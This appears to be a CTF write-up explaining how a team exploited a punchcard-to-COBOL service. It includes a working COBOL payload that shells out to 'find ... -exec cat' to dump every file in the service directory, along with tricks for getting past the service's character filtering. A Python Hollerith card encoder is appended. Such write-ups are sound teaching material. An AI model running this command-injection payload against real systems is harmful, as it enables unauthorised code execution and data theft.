@Tehada
Created May 27, 2019 10:26
punchy writeup

We analyzed the service's Python source code and observed these key points:

First we describe our solution, then we give more details on how we arrived at it.

Solution

We generated a sequence of punchcards with the COBOL exploit encoded on them, one line of code per card; some leading indentation was also required, otherwise COBOL produced syntax errors. The exploit itself is pretty simple:

       IDENTIFICATION DIVISION.
       PROGRAM-ID. HELLO.
       PROCEDURE DIVISION. BEGIN.
       CALL >SYSTEM> USING
       FUNCTION LOWER-CASE(>FIND . -TYPE F -EXEC CAT {} \;>). STOP RUN.

To send this script we generated 5 punchcards, one for each line. The script prints the contents of every file in the service's directory. Since this is effectively RCE, it could do much more than simply print file contents.

To generate a valid punchcard we used this script (it can be found by simply googling "python generate punchcard").

Now more details:

The most important things that helped us solve the task:

  • The HTTP request that the organizers sent to store flags. In the traffic we found:

      • an image of a valid punchcard, which the service handles without error

      • the text encoded in these punchcards. It was on the HTML upload page, where a user can join some pieces and then run them. There we saw code of this form:

       IDENTIFICATION DIVISION.
       PROGRAM-ID. FLAG.
       DATA DIVISION. WORKING-STORAGE SECTION. 01 FLG.
       05 FLGBASE32A PIC X(32) VALUE "IZAVKU2UL5ME63DWOBEVSQSTJNCFETLX".
       05 FLGBASE32B PIC X(32) VALUE "IFAUCQKEIREDK5CEIJHDSSCSKZGEC===".
       PROCEDURE DIVISION. BEGIN. DISPLAY FLG. STOP RUN.

This code was sent in punchcards, one line per card.

The flag consists of two base32-encoded parts on lines 4 and 5. We determined that this code is in the COBOL programming language, so we wrote our exploit in COBOL. It is worth mentioning that after the image is uploaded and before the COBOL code itself is executed, some internal transformation of the input happens (in .so files): some characters are discarded (such as lowercase letters), some are translated into other characters, and some simply produce an error on the server. Empirically we found that the character < translates into ". We solved the problem of dropped lowercase letters by using COBOL's LOWER-CASE function on our shell command.
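As an added example (not part of the original writeup, nor the punchcard script it refers to), here is a small decoder/encoder for the card format the service consumes, using the IBM 029 Hollerith table. The 029 table is an assumption; the service's own mapping, which the writeup says translates some characters, may differ. The encoder refuses lowercase letters because the 029 keyset has none, which is the constraint behind the dropped-lowercase problem described above.

```python
"""IBM 029 (Hollerith) punch-card column decoder/encoder (added example).
A column encodes one character as the set of rows punched in it; the rows
are 12, 11, 0, 1, ..., 9. The 029 table is an assumption about the card
format: the service's own mapping (which the writeup says translates some
characters) may differ.
"""
from typing import FrozenSet, Iterable, List

CODE = {frozenset(): " ", frozenset({12}): "&", frozenset({11}): "-",
        frozenset({0, 1}): "/"}
for digit in range(10):                      # a lone digit punch
    CODE[frozenset({digit})] = str(digit)
# Zone punch + digit punch gives a letter; the 0 zone starts at digit 2.
for zone, first, letters in ((12, 1, "ABCDEFGHI"), (11, 1, "JKLMNOPQR"),
                             (0, 2, "STUVWXYZ")):
    for i, ch in enumerate(letters):
        CODE[frozenset({zone, first + i})] = ch
# Specials: an 8 punch plus one of rows 2..7, optionally with a zone punch.
for zone, chars in ((None, ":#@'=\""), (12, "\u00a2.<(+|"),
                    (11, "!$*);\u00ac"), (0, "\x00,%_>?")):
    for i, ch in enumerate(chars):           # i = 0 -> row 2 ... i = 5 -> row 7
        if ch == "\x00":                     # 0-8-2 is unassigned on the 029
            continue
        rows = {8, 2 + i} | ({zone} if zone is not None else set())
        CODE[frozenset(rows)] = ch
ENCODE = {ch: rows for rows, ch in CODE.items()}


def decode_card(columns: Iterable[Iterable[int]]) -> str:
    """Turn a sequence of columns (rows punched per column) into one text line.

    A punch combination missing from the table raises instead of being
    guessed, so a malformed card is reported rather than silently mapped.
    """
    out = []
    for col in columns:
        rows = frozenset(col)
        if rows not in CODE:
            raise ValueError(f"invalid punch combination {sorted(rows)}")
        out.append(CODE[rows])
    return "".join(out).rstrip()


def encode_line(text: str) -> List[FrozenSet[int]]:
    """Inverse mapping, one column per character; the 029 keyset has no
    lowercase letters, so such text must be upper-cased or rejected first."""
    try:
        return [ENCODE[ch] for ch in text]
    except KeyError as exc:
        raise ValueError(f"no 029 punch code for {exc.args[0]!r}") from None
```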
